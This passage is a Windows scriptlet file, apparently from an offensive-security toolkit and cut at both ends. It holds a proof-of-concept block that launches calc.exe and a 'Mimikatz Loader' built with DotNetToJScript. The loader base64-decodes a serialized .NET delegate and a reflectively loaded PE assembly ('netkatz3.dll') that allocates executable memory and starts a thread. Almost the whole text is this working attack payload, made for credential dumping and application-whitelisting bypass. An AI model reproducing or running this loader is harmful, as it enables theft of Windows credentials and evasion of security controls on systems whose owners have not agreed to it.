16 | <!-- Based on current research, no registry keys are written, since call "uninstall" -->
17 |
18 |
19 | <!-- Proof Of Concept - Casey Smith @subTee -->
20 | <script language="JScript">
21 | <![CDATA[
22 |
23 | var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
24 |
25 | ]]>
26 | </script>
27 | </registration>
28 |
29 | <public>
30 | <method name="Exec"></method>
31 | </public>
32 | <script language="JScript">
33 | <![CDATA[
34 | // Mimikatz Loader
35 | // Built with DotNetToJScript.
36 | function Exec()
37 | {
38 | function setversion() {
39 | new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
40 | }
41 | function debug(s) {}
42 | function base64ToStream(b) {
43 | var enc = new ActiveXObject("System.Text.ASCIIEncoding");
44 | var length = enc.GetByteCount_2(b);
45 | var ba = enc.GetBytes_4(b);
46 | var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
47 | ba = transform.TransformFinalBlock(ba, 0, length);
48 | var ms = new ActiveXObject("System.IO.MemoryStream");
49 | ms.Write(ba, 0, (length / 4) * 3);
50 | ms.Position = 0;
51 | return ms;
52 | }
53 |
54 | var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
55 | "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
56 | "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
57 | "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
58 | "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
59 | "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
60 | "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
61 | "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
62 | "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
63 | "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
64 | "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
65 | "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
66 | "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
67 | "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
68 | "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
69 | "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
70 | "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
71 | "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
72 | "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
73 | "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
74 | "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
75 | "ZW1ibHkGFwAAAARMb2FkCg8MAAAAADYAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
76 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
77 | "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAs6ZgWgAAAAAA"+
78 | "AAAA4AACIQsBCwAALgAAAAYAAAAAAACeTAAAACAAAABgAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
79 | "AAAAAAAAAKAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAATEwA"+
80 | "AE8AAAAAYAAAqAIAAAAAAAAAAAAAAAAAAAAAAAAAgAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
81 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
82 | "AAAALnRleHQAAACkLAAAACAAAAAuAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAqAIAAABg"+
83 | "AAAABAAAADAAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAgAAAAAIAAAA0AAAAAAAAAAAA"+
84 | "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAIBMAAAAAAAASAAAAAIABQDALAAAjB8AAAEAAAAAAAAA"+
85 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzADABkAAAAB"+
86 | "AAARABIADwAoBAAACgNqWCgFAAAKAAYLKwAHKgAAABMwBwBSAAAAAgAAEQAoAgAABiZyAQAAcCAA"+
87 | "AABAGBYZFhYoAwAABgoGF3MHAAAKCwcYcwgAAAoMILUBAAAoCQAACg0ICXMKAAAKEwQRBBdvCwAA"+
88 | "CgARBCgMAAAKACpuAigNAAAKAAAoBAAABgByEQAAcCgHAAAGAAAqAAAbMAQAVQAAAAMAABEAIABA"+
89 | "AACNEwAAAQpzDgAACgsAKwwABwYWCG8PAAAKAAACBhYGjmlvEAAACiUMFv4CEwQRBC3eB28RAAAK"+
90 | "Dd4SBxT+ARMEEQQtBwdvEgAACgDcAAkqAAAAARAAAAIAEgAuQAASAAAAABswBgDUBwAABAAAEQBz"+
91 | "EwAACgoUCwAGAm8UAAAKDAhzFQAACg0JcxYAAAoTBQARBW8XAAAKbxgAAAoTLTiDAAAAES1vGQAA"+
92 | "ChMGABEGbxoAAApyyAAAcCgbAAAKLA0oHAAACh7+ARb+ASsBFwATLhEuLRQAEQZvHQAAChMEEQQo"+
93 | "BgAABgsrTREGbxoAAApy6gAAcCgbAAAKLA0oHAAAChr+ARb+ASsBFwATLhEuLRQAEQZvHQAAChME"+
94 | "EQQoBgAABgsrEQARLW8eAAAKEy4RLjpt////3hQRLRT+ARMuES4tCBEtbxIAAAoA3AAA3iETBwAr"+
95 | "CwARB28fAAAKEwcAEQcU/gEW/gETLhEuLecA3gAAB3MJAAAGEwgRCG8LAAAGFv4BEy4RLi0pAH4g"+
96 | "AAAKEQhvDQAABntAAAAEfp0AAAR+nwAABCgSAAAGgAUAAAQAKycAfiAAAAoRCG8OAAAGe20AAAR+"+
97 | "nQAABH6fAAAEKBIAAAaABQAABAAWEwkrfgB+BQAABBEIbw8AAAYRCY8JAAACe5EAAAQoAQAABhEI"+
98 | "bw8AAAYRCY8JAAACe5IAAAR+nQAABH6fAAAEKBIAAAYTChEIbxAAAAYRCG8PAAAGEQmPCQAAAnuT"+
99 | "AAAEEQoRCG8PAAAGEQmPCQAAAnuSAAAEKCEAAAoAABEJF1gTCREJEQhvDAAABnuJAAAE/gQTLhEu"+
100 | "Omn///9+BQAABBMLEQhvCwAABhb+ARMuES4tGwASCygiAAAKEQhvDQAABns2AAAEWWoTDAArGAAS"+
101 | "CygEAAAKEQhvDgAABntjAAAEWRMMABEIbwsAAAYW/gETLhEuLSEAfgUAAAQRCG8NAAAGe1AAAAR7"+
102 | "KwAABCgBAAAGEw0AKx8AfgUAAAQRCG8OAAAGe30AAAR7KwAABCgBAAAGEw0AEg7+FQ0AAAIRDdAN"+
103 | "AAACKCMAAAooJAAACqUNAAACEw7QDQAAAigjAAAKKCUAAAoTDxENExASDnuiAAAEExERDRMSOCoB"+
104 | "AAAAEhP+FQ0AAAIRDRERKAEAAAYTFBEU0A0AAAIoIwAACigkAAAKpQ0AAAITE34FAAAEEg57oQAA"+
105 | "BCgBAAAGExUWEwk4igAAAAAREh4YEQlaWCgmAAAK0RMXERcfDGPRExgRFyD/DwAAX9ETGREYEy8R"+
106 | "LxYuDREvGS4KES8fCi4oK0krRxEVERkoAQAABhMWERYoJwAAChMaERYRGhEMaVgoKAAACgArIxEV"+
107 | "ERkoAQAABhMWERYoKQAAChMbERYRGxEMWCgqAAAKACsAABEJF1gTCREJEg57ogAABG4RD2pZGGpb"+
108 | "af4EEy4RLjpZ////EQ0RESgBAAAGExIRERITe6IAAARYExERExMOERARESgBAAAGExASE3uiAAAE"+
109 | "Fv4BFv4BEy4RLi0CKwkAFxMuOM7+//8RCG8LAAAGFv4BEy4RLi1PAH4FAAAEEQhvDwAABhePCQAA"+
110 | "AnuRAAAEKAEAAAYTHH4FAAAEEQhvDQAABntMAAAEeysAAAQoAQAABhMdER0fECgBAAAGKCcAAAoT"+
111 | "HgArTQB+BQAABBEIbw8AAAYXjwkAAAJ7kQAABCgBAAAGExx+BQAABBEIbw4AAAZ7eQAABHsrAAAE"+
112 | "KAEAAAYTHREdHxAoAQAABignAAAKEx4AEQhvCwAABhb+ARMuES46fwEAAAAWEyE4HgEAAAB+BQAA"+
113 | "BB8UESFaEQhvDQAABntMAAAEeysAAARYKAEAAAYTIhEiHxAoAQAABignAAAKEyN+BQAABBEIbw8A"+
114 | "AAYXjwkAAAJ7kQAABBEjER5ZWCgBAAAGEyR+BQAABBEiHwwoAQAABignAAAKKAEAAAYTJRElKCsA"+
115 | "AAoTJhEmchABAHAoGwAAChb+ARMuES4tBgA4kQAAAAARJigTAAAGEycA3gQmAN53ABYTKCtlAH4F"+
116 | "AAAEESQoJwAACigBAAAGEykRKRgoAQAABigrAAAKEyoRJxEqKBQAAAYTKxEkESsoLAAACigoAAAK"+
117 | "ABEkGigBAAAGEyQRKnIQAQBwKBsAAAoW/gETLhEuLQIrDBEoF1gTKAAXEy4rlhEhF1gTIQAAFxMu"+
118 | "ONn+//8RCG8NAAAGe0AAAAQTIH4FAAAEEQhvDQAABnszAAAEKC0AAAoTH34gAAAKFhEffiAAAAoW"+
119 | "fiAAAAooFQAABhMsESwVKBYAAAYmADh6AQAAABYTITgeAQAAAH4FAAAEHxQRIVoRCG8OAAAGe3kA"+
120 | "AAR7KwAABFgoAQAABhMiESIfECgBAAAGKCcAAAoTI34FAAAEEQhvDwAABhePCQAAAnuRAAAEESMR"+
121 | "HllYKAEAAAYTJH4FAAAEESIfDCgBAAAGKCcAAAooAQAABhMlESUoKwAAChMmESZyEAEAcCgbAAAK"+
122 | "Fv4BEy4RLi0GADiRAAAAABEmKBMAAAYTJwDeBCYA3ncAFhMoK2UAfgUAAAQRJCgnAAAKKAEAAAYT"+
123 | "KREpGCgBAAAGKCsAAAoTKhEnESooFAAABhMrESQRKyguAAAKKCoAAAoAESQeKAEAAAYTJBEqchAB"+
124 | "AHAoGwAAChb+ARMuES4tAisMESgXWBMoABcTLiuWESEXWBMhAAAXEy442f7//xEIbw4AAAZ7bQAA"+
125 | "BBMgfgUAAAQRCG8OAAAGe2EAAAQoLQAAChMffiAAAAoWER9+IAAAChZ+IAAACigVAAAGEywRLBUo"+
126 | "FgAABiYAKgE0AAACADAAmsoAFAAAAAAAAAkA2eIAIR0AAAEAAHkFDYYFBB0AAAEAAPgGDQUHBB0A"+
127 | "AAEbMAMA5QAAAAUAABECKA0AAAoAAAMZF3MvAAAKCgAGczAAAAoLAgcoAQAAK30GAAAEBgJ8BgAA"+
128 | "BHsqAAAEbhZvMQAACiYHbzIAAAoMAgcoAgAAK30HAAAEAigLAAAGFv4BEwQRBC0QAAIHKAMAACt9"+
129 | "CAAABAArDgACBygEAAArfQkAAAQAAgJ8BwAABHuJAAAEjQkAAAJ9CgAABBYNKx0AAnsKAAAECY8J"+
130 | "AAACBygFAAArgQkAAAIACRdYDQkCewoAAASOaf4EEwQRBC3SAgMoMwAACn0LAAAEAN4SBhT+ARME"+
131 | "EQQtBwZvEgAACgDcAAAqAAAAARAAAAIAEQC/0AASAAAAABswAwDiAAAABgAAEQIoDQAACgAAAxYD"+
132 | "jmlzNAAACgoABnMwAAAKCwIHKAEAACt9BgAABAYCfAYAAAR7KgAABG4WbzEAAAomB28yAAAKDAIH"+
133 | "KAIAACt9BwAABAIoCwAABhb+ARMEEQQtEAACBygDAAArfQgAAAQAKw4AAgcoBAAAK30JAAAEAAIC"+
134 | "fAcAAAR7iQAABI0JAAACfQoAAAQWDSsdAAJ7CgAABAmPCQAAAgcoBQAAK4EJAAACAAkXWA0JAnsK"+
135 | "AAAEjmn+BBMEEQQt0gIDfQsAAAQA3hIGFP4BEwQRBC0HBm8SAAAKANwAACoAAAEQAAACABMAus0A"+
136 | "EgAAAAATMAIASQAAAAcAABEAAtADAAAbKCMAAAooJQAACm81AAAKCgYZKDYAAAoLEgEoNwAACtAD"+
137 | "AAAbKCMAAAooJAAACqUDAAAbDBIBKDgAAAoACA0rAAkqAAAAEzACABwAAAAIAAARACAAAQAACgYC"+
138 | "KAwAAAZ7jgAABF8G/gELKwAHKhMwAQAMAAAACQAAEQACewcAAAQKKwAGKhMwAQAMAAAACgAAEQAC"+
139 | "ewgAAAQKKwAGKhMwAQAMAAAACwAAEQACewkAAAQKKwAGKhMwAQAMAAAADAAAEQACewoAAAQKKwAG"+
140 | "KhMwAQAMAAAADQAAEQACewsAAAQKKwAGKhMwAQARAAAADgAAEQACe48AAARzPAAACgorAAYqiiAA"+
141 | "EAAAgJ0AAAQgACAAAICeAAAEH0CAnwAABBqAoAAABCoeAigNAAAKKkJTSkIBAAEAAAAAAAwAAAB2"+
142 | "NC4wLjMwMzE5AAAAAAUAbAAAAJQLAAAjfgAAAAwAAMgOAAAjU3RyaW5ncwAAAADIGgAAFAEAACNV"+
143 | "UwDcGwAAEAAAACNHVUlEAAAA7BsAAKADAAAjQmxvYgAAAAAAAAACAAABV/2jHQkOAAAA+iUzABYA"+
144 | "AAEAAAAsAAAADgAAAKcAAAAYAAAAHQAAAD4AAAAFAAAABAAAAAEAAAABAAAAAwAAAAoAAAAOAAAA"+
145 | "AgAAAAcAAAAHAAAAAgAAAAMAAAAHAAAAAQAAAAMAAAAKAAAAAQAAAAUAAAAAAAoAAQAAAAAABgAJ"+
146 | "AQIBBgAQAQIBBgAaAQIBBgCiAZgBBgAPApgBBgANCvEJBgApCvEJBgBYCjgKBgB4CjgKBgCfCgIB"+
147 | "BgDNCq4KBgAJC+0KBgAYC5gBBgAjC5gBBgA6Cy4LBgBPC5gBBgBqCwIBBgByC5gBBgCECwIBBgCJ"+
148 | "C5gBBgCpCwIBCgDIC70LDgD1C98LBgAfDAAMDgA0DN8LBgBrDFAMBgCgDAIBBgDUDMEMBgDpDAIB"+
149 | "BgALDa4KBgAgDQIBBgAlDQIBBgCzDZgBBgC8DZgBBgDXDZgBBgDzDa4KBgD8Da4KBgAnDq4KBgA9"+
150 | "Dq4KBgBIDq4KBgBdDq4KBgBwDq4KBgB+DgIBBgCtDp0OAAAAAAEAAAAAAAEAAQABABAAFwAAAAUA"+
151 | "AQABAAEAEAAhAAAABQAGAAgACgEQACoAAAAJAAwAEQAKARAAOwAAAAkAKwARAAoBEABQAAAACQAt"+
152 | "ABEACgEQAGgAAAAJAFsAEQAKARAAgAAAAAkAiAARABIBEACSAAAACQCPABEACgEQAKcAAAAJAJkA"+
153 | "EgACAQAAvQAAAA0AmwASAAAAEADOAAAABQCdABIACgEQAKcAAAAJAKEAGQAKARAA4QAAAAkAowAZ"+
154 | "AFGAHwEKAFGALAESAFGAOgESAFGASwESABYAYwEqAAEAuwFQAAEAxQFUAAEA0AFYAAEA4QFcAAEA"+
155 | "8gFgAAEABgJlAAYA9wK4AAYA/wK4AAYABgO4AAYACwO4AAYAEgO4AAYAHAO4AAYAJwO4AAYAMgO4"+
156 | "AAYANwO4AAYAPAO4AAYAQwO4AAYASAO4AAYATQO4AAYAVgO4AAYAXQO4AAYAZQO4AAYAbQO4AAYA"+
157 | "dQO4AAYAfQO4AAYAhQO4AAYAjwO4AAYAmAO4AAYAoQO4AAYAqgO4AAYAswO4AAYAvAO4AAYAxQO4"+
158 | "AAYAzgO4AAYA1wO4AAYA4AO4AAYA6QMSAAYA8gMSAAYAAQQSAAYABgS4AAYADAS7AAYAHwS7AAYA"+
159 | "MgQSAAYAPQQSAAYAUwQSAAYAawQSAAYAfwQSAAYAigQSAAYAlQQSAAYAnwQSAAYAsAQSAAYAvgS4"+
160 | "AAYA2gS4AAYA9gS4AAYACAW4AAYAGgW4AAYAMAW4AAYARgUSAAYAWAUSAAYAZAUSAAYAcgUSAAYA"+
161 | "ewW4AAYAhQW4AAYAmAUSAAYAqwUSAAYAvQUSAAYAzwUSAAYA4AUSAAYA7AUSAAYAAAa+AAYADAa+"+
162 | "AAYAGAa+AAYAJga+AAYANQa+AAYARga+AAYAWga+AAYAYAa+AAYAbQa+AAYAdwa+AAYAgAa+AAYA"+
163 | "kAa+AAYAnAa+AAYAoAa+AAYAtga+AAYAxwa+AAYABgS4AAYADAS7AAYAHwS7AAYAMgQSAAYAPQQS"+
164 | "AAYAUwQSAAYAawQSAAYAfwQSAAYAlQTCAAYAnwQSAAYAsAQSAAYAvgS4AAYA2gS4AAYA9gS4AAYA"+
165 | "CAW4AAYAGgW4AAYAMAW4AAYARgUSAAYAWAUSAAYAZAUSAAYAcgUSAAYAewW4AAYAhQW4AAYAmAXC"+
166 | "AAYAqwXCAAYAvQXCAAYAzwXCAAYA4AUSAAYA7AUSAAYAAAa+AAYADAa+AAYAGAa+AAYAJga+AAYA"+
167 | "NQa+AAYARga+AAYAWga+AAYAYAa+AAYAbQa+AAYAdwa+AAYAgAa+AAYAkAa+AAYAnAa+AAYAoAa+"+
168 | "AAYAtga+AAYAxwa+AAYA0Aa4AAYA2Aa4AAYA6QYSAAYA9wYSAAYADAcSAAYAHAe4AAYAMQe4AAYQ"+
169 | "QQfFAAYARgcSAAYA8gMSAAYAUgcSAAYAYAcSAAYAcQcSAAYAhgcSAAYAmwe4AAYArwe4AAYAMQfJ"+
170 | "AAYA1wcSAAYA5QcSAAYG8QcSAFaA+QfJABYA/gcSABYACQgSABYAFQgSABYALAgSAAYA1wcSAAYA"+
171 | "5QcSAAYAhAgSAAYA6QYSAAYAlwgSAAYAQQcSAAYApggSAFAgAAAAAJYAWQEkAAEAAAAAAIAAkSBs"+
172 | "AS0AAwAAAAAAgACRIHkBMQADAHggAAAAAJYAhAE8AAoA1iAAAAAAhhiSAUAACgD0IAAAAACWAKkB"+
173 | "RAAKAGghAAAAAJYAswFLAAsAfCkAAAAAhhiSAWkADACAKgAAAACGGJIBbgANAIArAAAAAJYAHAJ0"+
174 | "AA4A2CsAAAAAhggvAnwADwAALAAAAACGCEECgAAPABgsAAAAAIYIUAKFAA8AMCwAAAAAhghlAooA"+
175 | "DwBILAAAAACGCHoCjwAPAGAsAAAAAIYIkgKVAA8AeCwAAAAAhgjDB80ADwAAAAAAgACWIDsI2gAP"+
176 | "AAAAAACAAJYgSAjiABMAAAAAAIAAliBUCOcAFAAAAAAAgACWIGMI7QAWAAAAAACAAJYgcAj3ABwA"+
177 | "uCwAAAAAhhiSAUAAHgCVLAAAAACRGJYOPAAeAAAAAQCxCAAAAgCzCAAAAQC1CAAAAgDACAAAAwDQ"+
178 | "CAAABADcCAAABQDxCAAABgAHCQAABwAcCQAAAQAqCQAAAQAwCQAAAQA0CQAAAQA9CQAAAQBHCQAA"+
179 | "AQBOCQAAAgBaCQAAAwBfCQAABABwCQAAAQC1CAAAAQB6CQAAAgCCCQAAAQCLCQAAAgCeCQAAAwCq"+
180 | "CQAABAC5CQAABQC/CQAABgDPCQAAAQDaCQAAAgDiCTEAkgH9AEEAkgEDAUkAkgFAAFEApgoIAVEA"+
181 | "kgEMAVkAkgFpAGEAkgEWAWkAkgEcAXkAQwskAYEAkgEqAYEAXAsyAYkAfQs3AQkAkgFAAKEAkgFA"+
182 | "ACEAlgtJASEAnAtRAaEAoQuVAKkAtQtAALEAkgFAALEA0gtkAaEAkgFuALkAkgFqAbkARAxwAQwA"+
183 | "eQyAARQAhwyQAckAkwzNANkApwyVAVEAswwtAMkAvAybAeEA4Ax8AOkA8wygAVEABg0qAPEAEw2l"+
184 | "AVEAGA2uAfkANw2yAfEASQ26AfEAWA3BAfEAXw3HAfEAaQ3NAfEAcw3SAfEAfg3YAfEAiA3dAfEA"+
185 | "kw3jAVEAow3NAVEArw0kAFEAow3YAWkAkgErAikAkgFqASEAxw06AikAzA1CAhkB3A1aAqEAkgFJ"+
186 | "ASkA6Q13AiEBCQ59AiEBDw6HAiEBIg5AADEBkgG2AkEBkgEDAUkBkgG9AtkAkgHHAlkBkgFAAGEB"+
187 | "kgFAAAgABAANAAkACAAVAAkADAAaAAkAEAAfAAkAcALVACcA8wHRAi4AEwDWAi4AGwDfAmMB6wHR"+
188 | "Ah4BxAIIAAYA/gIBAAAAAAAGAAEAAAAAAAcAAQAAAAAACAAAAAAAjwAIAAAAkAAMAAAAkQAQAAAA"+
189 | "kgAUAAAAkwAYAAAAlAAcAAAAlQAgAAAAlgAiAAAAlwAkAAAAmAARAT0BWQHoAWACagKLApcCnAKh"+
190 | "AqYCqwKxAs0CAwABAAkABwAAAJ8CmgAAAK0CngAAALgCowAAAMkCqAAAANoCrQAAAO4CswAAAM8H"+
191 | "0QACAAsAAwACAAwABQACAA0ABwACAA4ACQACAA8ACwACABAADQACABEADwDgCo0OeQGJAXQCRgMF"+
192 | "AGwBAQBAAQcAeQEBAAABJQA7CAIARAEnAEgIAQBDASkAVAgBAAABKwBjCAIAAAEtAHAIAgAEgAAA"+
193 | "AAAAAAAAAAAAAAAAAACWCgAABAAAAAAAAAAAAAAAAQD5AAAAAAAEAAAAAAAAAAAAAAABAAIBAAAA"+
194 | "AAQAAAAAAAAAAAAAAAEA3wsAAAAABAADAAUAAwAGAAMABwADAAgAAwAJAAMACgADAAsAAwANAAwA"+
195 | "DgAMAAAAAAAVAC0CFAA1AhQARgIUAEsCFABQAhQAVQIAAAA8TW9kdWxlPgBuZXRrYXR6My5kbGwA"+
196 | "VGVzdENsYXNzAFBFTG9hZGVyAElNQUdFX0RPU19IRUFERVIASU1BR0VfREFUQV9ESVJFQ1RPUlkA"+
197 | "SU1BR0VfT1BUSU9OQUxfSEVBREVSMzIASU1BR0VfT1BUSU9OQUxfSEVBREVSNjQASU1BR0VfRklM"+
198 | "RV9IRUFERVIASU1BR0VfU0VDVElPTl9IRUFERVIASU1BR0VfQkFTRV9SRUxPQ0FUSU9OAERhdGFT"+
199 | "ZWN0aW9uRmxhZ3MATmF0aXZlRGVjbGFyYXRpb25zAElNQUdFX0lNUE9SVF9ERVNDUklQVE9SAG1z"+
200 | "Y29ybGliAFN5c3RlbQBPYmplY3QAVmFsdWVUeXBlAEVudW0ATVlfQ09ERV9QQUdFAEdFTkVSSUNf"+
201 | "V1JJVEUARklMRV9TSEFSRV9XUklURQBPUEVOX0VYSVNUSU5HAEludFB0ckFkZABjb2RlYmFzZQBB"+
202 | "bGxvY0NvbnNvbGUAQ3JlYXRlRmlsZQBDcmVhdGVDb25zb2xlAC5jdG9yAFN5c3RlbS5JTwBTdHJl"+
203 | "YW0AUmVhZEZ1bGx5AEV4ZWN1dGUAZG9zSGVhZGVyAGZpbGVIZWFkZXIAb3B0aW9uYWxIZWFkZXIz"+
204 | "MgBvcHRpb25hbEhlYWRlcjY0AGltYWdlU2VjdGlvbkhlYWRlcnMAcmF3Ynl0ZXMAQmluYXJ5UmVh"+
205 | "ZGVyAEZyb21CaW5hcnlSZWFkZXIAVABnZXRfSXMzMkJpdEhlYWRlcgBnZXRfRmlsZUhlYWRlcgBn"+
206 | "ZXRfT3B0aW9uYWxIZWFkZXIzMgBnZXRfT3B0aW9uYWxIZWFkZXI2NABnZXRfSW1hZ2VTZWN0aW9u"+
207 | "SGVhZGVycwBnZXRfUmF3Qnl0ZXMASXMzMkJpdEhlYWRlcgBGaWxlSGVhZGVyAE9wdGlvbmFsSGVh"+
208 | "ZGVyMzIAT3B0aW9uYWxIZWFkZXI2NABJbWFnZVNlY3Rpb25IZWFkZXJzAFJhd0J5dGVzAGVfbWFn"+
209 | "aWMAZV9jYmxwAGVfY3AAZV9jcmxjAGVfY3BhcmhkcgBlX21pbmFsbG9jAGVfbWF4YWxsb2MAZV9z"+
210 | "cwBlX3NwAGVfY3N1bQBlX2lwAGVfY3MAZV9sZmFybGMAZV9vdm5vAGVfcmVzXzAAZV9yZXNfMQBl"+
211 | "X3Jlc18yAGVfcmVzXzMAZV9vZW1pZABlX29lbWluZm8AZV9yZXMyXzAAZV9yZXMyXzEAZV9yZXMy"+
212 | "XzIAZV9yZXMyXzMAZV9yZXMyXzQAZV9yZXMyXzUAZV9yZXMyXzYAZV9yZXMyXzcAZV9yZXMyXzgA"+
213 | "ZV9yZXMyXzkAZV9sZmFuZXcAVmlydHVhbEFkZHJlc3MAU2l6ZQBNYWdpYwBNYWpvckxpbmtlclZl"+
214 | "cnNpb24ATWlub3JMaW5rZXJWZXJzaW9uAFNpemVPZkNvZGUAU2l6ZU9mSW5pdGlhbGl6ZWREYXRh"+
215 | "AFNpemVPZlVuaW5pdGlhbGl6ZWREYXRhAEFkZHJlc3NPZkVudHJ5UG9pbnQAQmFzZU9mQ29kZQBC"+
216 | "YXNlT2ZEYXRhAEltYWdlQmFzZQBTZWN0aW9uQWxpZ25tZW50AEZpbGVBbGlnbm1lbnQATWFqb3JP"+
217 | "cGVyYXRpbmdTeXN0ZW1WZXJzaW9uAE1pbm9yT3BlcmF0aW5nU3lzdGVtVmVyc2lvbgBNYWpvcklt"+
218 | "YWdlVmVyc2lvbgBNaW5vckltYWdlVmVyc2lvbgBNYWpvclN1YnN5c3RlbVZlcnNpb24ATWlub3JT"+
219 | "dWJzeXN0ZW1WZXJzaW9uAFdpbjMyVmVyc2lvblZhbHVlAFNpemVPZkltYWdlAFNpemVPZkhlYWRl"+
220 | "cnMAQ2hlY2tTdW0AU3Vic3lzdGVtAERsbENoYXJhY3RlcmlzdGljcwBTaXplT2ZTdGFja1Jlc2Vy"+
221 | "dmUAU2l6ZU9mU3RhY2tDb21taXQAU2l6ZU9mSGVhcFJlc2VydmUAU2l6ZU9mSGVhcENvbW1pdABM"+
222 | "b2FkZXJGbGFncwBOdW1iZXJPZlJ2YUFuZFNpemVzAEV4cG9ydFRhYmxlAEltcG9ydFRhYmxlAFJl"+
223 | "c291cmNlVGFibGUARXhjZXB0aW9uVGFibGUAQ2VydGlmaWNhdGVUYWJsZQBCYXNlUmVsb2NhdGlv"+
224 | "blRhYmxlAERlYnVnAEFyY2hpdGVjdHVyZQBHbG9iYWxQdHIAVExTVGFibGUATG9hZENvbmZpZ1Rh"+
225 | "YmxlAEJvdW5kSW1wb3J0AElBVABEZWxheUltcG9ydERlc2NyaXB0b3IAQ0xSUnVudGltZUhlYWRl"+
226 | "cgBSZXNlcnZlZABNYWNoaW5lAE51bWJlck9mU2VjdGlvbnMAVGltZURhdGVTdGFtcABQb2ludGVy"+
227 | "VG9TeW1ib2xUYWJsZQBOdW1iZXJPZlN5bWJvbHMAU2l6ZU9mT3B0aW9uYWxIZWFkZXIAQ2hhcmFj"+
228 | "dGVyaXN0aWNzAE5hbWUAVmlydHVhbFNpemUAU2l6ZU9mUmF3RGF0YQBQb2ludGVyVG9SYXdEYXRh"+
229 | "AFBvaW50ZXJUb1JlbG9jYXRpb25zAFBvaW50ZXJUb0xpbmVudW1iZXJzAE51bWJlck9mUmVsb2Nh"+
230 | "dGlvbnMATnVtYmVyT2ZMaW5lbnVtYmVycwBnZXRfU2VjdGlvbgBTZWN0aW9uAFZpcnR1YWxBZHJl"+
231 | "c3MAU2l6ZU9mQmxvY2sAdmFsdWVfXwBTdHViAE1FTV9DT01NSVQATUVNX1JFU0VSVkUAUEFHRV9F"+
232 | "WEVDVVRFX1JFQURXUklURQBQQUdFX1JFQURXUklURQBWaXJ0dWFsQWxsb2MATG9hZExpYnJhcnkA"+
233 | "R2V0UHJvY0FkZHJlc3MAQ3JlYXRlVGhyZWFkAFdhaXRGb3JTaW5nbGVPYmplY3QAT3JpZ2luYWxG"+
234 | "aXJzdFRodW5rAEZvcndhcmRlckNoYWluAEZpcnN0VGh1bmsAYQBiAGxwRmlsZU5hbWUAZHdEZXNp"+
